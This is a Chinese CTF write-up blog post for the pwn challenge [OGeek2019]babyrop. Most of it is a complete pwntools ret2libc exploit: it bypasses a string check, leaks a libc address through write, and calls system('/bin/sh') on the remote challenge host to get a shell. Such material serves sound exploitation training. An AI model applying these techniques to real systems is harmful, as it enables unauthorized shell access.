pwn | [OGeek2019]babyrop
[OGeek2019]babyrop
依旧是栈溢出ret2libc的题目。
这个题给了libc,但是一开始我没用,直接写了LibcSearcher的脚本,结果打出来的地址不对。
可能是LibcSearcher匹配到的libc版本和题目给的不一致(用题目附带的libc-2.23.so算偏移就对了),还好有lemon师傅给我提供了一些指导[可以用patchelf去改程序依赖的libc库然后本地调试]。
一开始弄栈结构的时候又有点糊涂了,简单写一下
xxxxxxxx # 垃圾数据
xxxxxxxx
xxxxxxxx
p_system # 返回地址
p_system的返回地址
p_system的参数1
参数2
......
exp:
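from pwn import *
from LibcSearcher.LibcSearcher import *
import struct

context.log_level = 'debug'

# sh = process('./pwn')
sh = remote('node4.buuoj.cn', 27276)
elf = ELF('./pwn')

# The challenge ships its libc, so take symbol offsets from it directly.
# (LibcSearcher returned a non-matching build here, see the commented-out
# alternative further down.)
_libc = ELF('./libc-2.23.so')
_p_libc_system = _libc.symbols['system']
_p_libc_binsh = next(_libc.search(b'/bin/sh'))
_p_libc_read = _libc.symbols['read']

write_plt = elf.plt['write']
read_got = elf.got['read']
read_plt = elf.plt['read']
p_main = 0x8048825    # return here after the leak so main's buffer can be overflowed again
p_ret = 0x08048502    # plain `ret` gadget; not needed on 32-bit, kept for reference

# First input of each round. Presumably the leading NUL defeats the server's
# string compare (strlen() == 0), and the 0xff at offset 7 is later used as the
# length of the read into the stack buffer, which is what allows the overflow
# — confirm against the binary's check routine.
CHECK_BYPASS = b'\x00aaaaaa\xffa'
# 0xe7 bytes of buffer + 4 bytes of saved ebp before the return address
# (offset taken from the disassembly, not visible in this script).
PADDING = b'a' * 0xe7 + b'b' * 4

sh.sendline(CHECK_BYPASS)
sh.recvuntil(b'Correct\n')

# Stage 1: write(1, read@got, 4) leaks the libc address of read(), then ret2main.
payload = PADDING + p32(write_plt) + p32(p_main) + p32(1) + p32(read_got) + p32(4)
sh.sendline(payload)
# recvn(4) blocks until exactly 4 bytes arrive; recv(4) may return fewer and
# u32() would then raise on a short buffer.
p_libc_read = u32(sh.recvn(4))
log.info(f'p_libc_read: {p_libc_read:#x}')

# Sanity check: libc is mapped page-aligned, so the low 12 bits of the leaked
# address must equal the symbol's low 12 bits in libc-2.23.so. A mismatch means
# the remote libc differs or the stream is desynchronised, and the stage-2
# addresses would only crash the target; bail out instead.
if (p_libc_read & 0xfff) != (_p_libc_read & 0xfff):
    log.error(f'leak {p_libc_read:#x} does not match libc-2.23.so '
              f'(expected low bits {_p_libc_read & 0xfff:#x})')

# Alternative without the provided libc (gave a wrong match on this challenge):
# libc = LibcSearcher('read', p_libc_read)
# libc_base = p_libc_read - libc.dump('read')
# p_system = libc_base + libc.dump('system')
# p_binsh = libc_base + libc.dump('str_bin_sh')
libc_base = p_libc_read - _p_libc_read
p_system = libc_base + _p_libc_system
p_binsh = libc_base + _p_libc_binsh
log.info(f'libc_base: {libc_base:#x} system: {p_system:#x} /bin/sh: {p_binsh:#x}')

# Stage 2: pass the check again, then system("/bin/sh") with main as its return
# address (the fake frame: ret -> system, system's ret -> main, arg1 -> "/bin/sh").
sh.send(CHECK_BYPASS)
sh.recvuntil(b'Correct\n')
print('\n\n')
payload = PADDING + p32(p_system) + p32(p_main) + p32(p_binsh)
sh.sendline(payload)
sh.interactive()
sh.close()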
本文来自博客园,作者:Mz1,转载请注明原文链接:https://www.cnblogs.com/Mz1-rc/p/15562427.html
如果有问题可以在下方评论或者email:mzi_mzi@163.com